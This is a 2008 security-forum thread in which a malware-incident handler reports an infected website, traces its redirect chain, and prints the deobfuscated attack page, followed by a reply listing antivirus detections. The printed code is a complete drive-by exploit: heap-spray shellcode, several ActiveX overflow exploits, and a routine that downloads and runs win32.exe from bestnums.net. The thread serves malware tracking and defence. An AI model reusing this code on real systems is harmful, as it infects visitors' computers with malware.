CastleCops® Radio Gaga

Need help? Click here to register for free! Absolutely zero advertisements on this site!

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Forum FAQ

Usergroups

Profile

Select FavForums

Radio Gaga

All -> FavForums -> Web Malware Links

[del.icio.us!] [digg it!] [reddit!]

View previous topic :: View next topic

Author

Message

downie

PIRT Handler

Joined: May 19, 2006
Posts: 3983

Posted: Sun Mar 09, 2008 1:52 pm Post subject: Radio Gaga

hxxp://bcgbaust.org/
Obfuscript for Iframe with src
hxxp://gate4traff.net/t/?'+Math.round(Math.random()*20091)+'a70d2a'
calls on first attempt
hxxp://81.2.197.14/pls/pls2/count.php?o=11&ed33e7
(second attempt hxxp://bestnums.net/strong/184/?c54803
third attempt
hxxp://bestnums.net/strong/188/?38e219
then nothing)
81.2 etc calls
hxxp://bestnums.net/strong/184/?222810
which deofuscated is

Code:

<html>
<body><div id="mydiv"></div><div id='exp'></div><Script Language='JavaScript'>
var mm = new Array();
var mem_flag = 0;

function h() {mm=mm; setTimeout("h()", 2000);}

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function cf()
{var zc = 0x05050505;
var a = unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca%u0040%ucbe8%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00bd%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6562%u7473%u756e%u736d%u6e2e%u7465%u642f%u2f6c%u3831%u2f34%u6977%u336e%u2e32%u7865%u0065%u0000%u6460%u1d8b%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013%ub900%u000f%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73%ud601%uc601%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000");
var heapBl2ckSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBl2ckSize - (pls+0x38);
var b = unescape("%u0505%u0505"); b = getb(b,bSize);
heapBl2cks = (zc - 0x400000)/heapBl2ckSize;

for (i=0;i<heapBl2cks;i++)
{mm[i] = b + a;}

mem_flag = 1;
return mm;
}

function startWVF()
{
for (i=0;i<128;i++)
{
   try{
      var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
      d = 0x7ffffffe;
      b = 0x05050505
      tar.setSlice(d, b, b, b );
   }catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
   try {
      var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
      if (tar) {
         if (! mem_flag) cf();
         startWVF();
      }
   } catch(e) { }
}

function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
   var rnum = Math.floor(Math.random() * chars.length);
   randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
   xml.open("GET", url, false);
   xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function AD2BDStreamSave(o, name, data) {

try {
   o.Type = 1;
   o.Mode = 3;
   o.Open();
   o.Write(data);
   o.SaveToFile(name, 2);
   o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
   try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
   try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MD2C() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://bestnums.net/dl/184/win32.exe';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
   var a = null;

   try {
      a = document.createElement("object");
      a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
   } catch(e) { a = null; }

   if (a) {
      if (! v[0]) {
         v[0] = CreateObject(a, "msxml2.XMLHTTP");
         if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
         if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
      }

      if (! v[1]) {
         v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
      }

      if (! v[2]) {
         v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
         if (! v[2]) {
            v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
            if (v[2]) n=1;
         }
      }
   }

   i++;
}

if (v[0] && v[1] && v[2]) {
   var data = XMLHttpDownload(v[0], urlRealExe);
   if (data != 0) {
      var name = "c:\\sys"+GetRandString(4)+".exe";
      if (AD2BDStreamSave(v[1], name, data) == 1) {
         if (ShellExecute(v[2], name, n) == 1) {
            ret=1;
         }
      }
   }
}

return ret;
}

function ie7_pr()
{
var url="http://bestnums.net/dl/184/win32.exe";
var outValue = '';
for (i=0; i<url.length; ) {
outValue += '%u' + url.charCodeAt(i+1).toString(16)+url.charCodeAt(i).toString(16);
i=i+2;
}
x = unescape("66666666666666666666666666666666666"+outValue);
z = unescape("%u0"+'d0'+"d"+"%u0"+"d0d");
while(z.length<0x40000)z+=z;
z=z.substring(0,0x3ffe4-x.length);
o=new Array();
for(i=0;i<450;i++)o[i]=z+x;
n=Math.ceil(0xd0d0d0d);
document.write('<object classid="CLSI"+"D:EC44"+"4CB6-3E7E-4"+"865-B1C3-0DE7"+"2EF39B3F"></object>');
n=document.scripts[0].createControlRange().length;
}
function start() {

if (! MD2C() )
{
   startOverflow(0);
ie7_pr();
}
}

start();
</script>    </body>
</html>

There'll be other pages infested too I'm sure.

_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."

maliciousbrains

Sergeant

Premium Member

Joined: Feb 23, 2008
Posts: 103

Posted: Sun Mar 09, 2008 2:08 pm Post subject:

Result: 17/32 (53.13%) Antivirus Version Last Update Result AhnLab-V3 2008.3.4.0 2008.03.07 - AntiVir 7.6.0.73 2008.03.07 HTML/Shellcode.Gen Authentium 4.93.8 2008.03.07 JS/IESlice.B Avast 4.7.1098.0 2008.03.09 - AVG 7.5.0.516 2008.03.08 Exploit BitDefender 7.2 2008.03.09 Exploit.HTML.Agent.X CAT-QuickHeal 9.50 2008.03.08 - ClamAV 0.92.1 2008.03.09 JS.Dropper-33 DrWeb 4.44.0.09170 2008.03.09 VBS.Psyme.443 eSafe 7.0.15.0 2008.03.09 JS.Shellcode.m eTrust-Vet 31.3.5597 2008.03.07 JS/MS05-014 Ewido 4.0 2008.03.09 Downloader.Agent.hq FileAdvisor 1 2008.03.09 - Fortinet 3.14.0.0 2008.03.08 - F-Prot 4.4.2.54 2008.03.08 JS/IESlice.B F-Secure 6.70.13260.0 2008.03.08 - Ikarus T3.1.1.20 2008.03.09 - Kaspersky 7.0.0.125 2008.03.09 - McAfee 5247 2008.03.07 JS/Exploit-BO.gen Microsoft 1.3301 2008.03.07 Exploit:JS/MS05014 NOD32v2 2932 2008.03.09 JS/TrojanDownloader.Psyme.HX Norman 5.80.02 2008.03.07 JS/Shellcode.A Panda 9.0.0.4 2008.03.09 - Prevx1 V2 2008.03.09 - Rising 20.34.62.00 2008.03.09 Trojan.DL.JS.Agent.lfo Sophos 4.27.0 2008.03.09 Mal/JSShell-B Sunbelt 3.0.930.0 2008.03.05 - Symantec 10 2008.03.09 - TheHacker 6.2.92.238 2008.03.08 - VBA32 3.12.6.2 2008.03.05 - VirusBuster 4.3.26:9 2008.03.08 - Webwasher-Gateway 6.6.2 2008.03.09 Script.Shellcode.Gen Additional information File size: 6853 bytes MD5: 6ab7acb692edc689809466007914c43b SHA1: 05dcd1d70b9e3e5ad6dc9eb4cd717addeeee659a PEiD: - File is getting detected by 50% or more AV Scanners. We will not upload the file in ListServ. _________________ .:: Malicious Brains ::. http://www.malwareinfo.org http://blog.malwareinfo.org http://forum.malwareinfo.org There are no patches or service packs for ignorance!

	All -> FavForums -> Web Malware Links	All times are GMT
Page 1 of 1

You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 228ppm 0.251s (0.038s) Making cybercriminals unhappy since 2002*